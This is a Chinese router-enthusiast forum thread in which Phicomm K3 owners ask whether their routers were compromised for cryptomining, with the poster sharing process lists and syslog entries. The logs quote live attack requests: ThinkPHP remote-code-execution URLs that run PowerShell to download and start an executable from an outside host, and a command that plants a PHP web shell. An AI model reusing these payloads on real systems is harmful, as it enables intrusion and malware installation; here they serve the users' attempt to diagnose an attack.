找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
楼主: ttxl123

[k3] 这可不得了 大神来分析一下 K3被挖矿了?

[复制链接]
发表于 2019-2-28 13:57 | 显示全部楼层
占个位置看一下结果,这玩意到底是什么漏洞
回复 支持 反对

使用道具 举报

发表于 2019-2-28 14:22 | 显示全部楼层
求解!!!!!!!!!
回复 支持 反对

使用道具 举报

发表于 2019-2-28 16:01 | 显示全部楼层
这个需要大神来解释一下了,本人小白看不懂啊
回复 支持 反对

使用道具 举报

发表于 2019-2-28 18:51 | 显示全部楼层
同版本固件,没有发现你说的download
回复 支持 反对

使用道具 举报

发表于 2019-2-28 19:01 | 显示全部楼层
跟帖观察。
回复 支持 反对

使用道具 举报

发表于 2019-2-28 19:10 | 显示全部楼层
围观一下紫薯布丁
回复 支持 反对

使用道具 举报

发表于 2019-3-1 09:48 | 显示全部楼层
我手上的3台K3都有差不多的情况.
固件官改2.02

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

点评

哇 这说明了什么???  详情 回复 发表于 2019-3-1 10:02
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-3-1 09:49 | 显示全部楼层
目前未发现局域网电脑异常 就是无意间点进去看到了日志
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-3-1 09:53 | 显示全部楼层
jzyjjzz 发表于 2019-2-28 13:50
楼主,我今天也碰了一个很奇怪的事情,我的主路由是K3C刷的官改1.6,二级路由是K3刷的TB的梅林.今天早上莫名的 ...

你这个更玄幻 不懂
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-3-1 09:58 | 显示全部楼层
badcrazy 发表于 2019-2-28 12:10
这个应该是斐讯的路由app相关的东西吧

就是不懂啊 也没有用那个APP 现在怀疑是哪个php恶意文件了
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-3-1 10:02 | 显示全部楼层
谁不曾有过遗憾 发表于 2019-3-1 09:48
我手上的3台K3都有差不多的情况.
固件官改2.02

哇 这说明了什么???
回复 支持 反对

使用道具 举报

发表于 2019-3-1 14:34 | 显示全部楼层
ttxl123 发表于 2019-3-1 09:58
就是不懂啊 也没有用那个APP 现在怀疑是哪个php恶意文件了

你用不用app路由器都会连斐讯服务器,否则app怎么穿透

点评

是一直有斐讯的进程在运行。。。 597 admin 3192 S phi_report 731 admin 1196 S wl_cr 746 admin 1060 S btn 754 admin 2500 S uhmi 783 admin 1132 S phi_spee  详情 回复 发表于 2019-3-1 15:54
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-3-1 15:54 | 显示全部楼层
badcrazy 发表于 2019-3-1 14:34
你用不用app路由器都会连斐讯服务器,否则app怎么穿透

是一直有斐讯的进程在运行。。。
  597 admin      3192 S   phi_report
  731 admin      1196 S   wl_cr
  746 admin      1060 S   btn
  754 admin      2500 S   uhmi
  783 admin      1132 S   phi_speed1
回复 支持 反对

使用道具 举报

发表于 2019-3-1 15:58 | 显示全部楼层
ttxl123 发表于 2019-3-1 15:54
是一直有斐讯的进程在运行。。。
  597 admin      3192 S   phi_report
  731 admin      1196 S   wl ...

对啊,我不是说了不管你用不用app都会连斐讯服务器的

点评

正常的也就算了 可是这一堆明显有问题了 Feb 27 08:49:28 K3B user.err syslog: PHIAPP url:/public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5  详情 回复 发表于 2019-3-1 16:00
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-3-1 16:00 | 显示全部楼层
badcrazy 发表于 2019-3-1 15:58
对啊,我不是说了不管你用不用app都会连斐讯服务器的

正常的也就算了  可是这一堆明显有问题了
Feb 27 08:49:28 K3B user.err syslog: PHIAPP url:/public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.buleher
Feb 27 08:49:29 K3B user.err syslog: PHIAPP url:/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php
Feb 27 08:49:30 K3B user.err syslog: PHIAPP url:/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start%20C:/12.exe
Feb 27 09:07:23 K3B user.err syslog: PHIAPP url:/update.asp?content=2A9A826AC6FB90ECF4B2F7616AF8FF9BD1BB13C1A0FEC5F83CAAAA106FC52533617BD2A7E9691CBE2608A365D1084681159796E42CA803EBDC6420F0CD383B69162C58F94A2236651BFBE818AF0A5C678BE82E6646AFD021589D63CAB958C1A5FF04
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-6-5 19:48

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表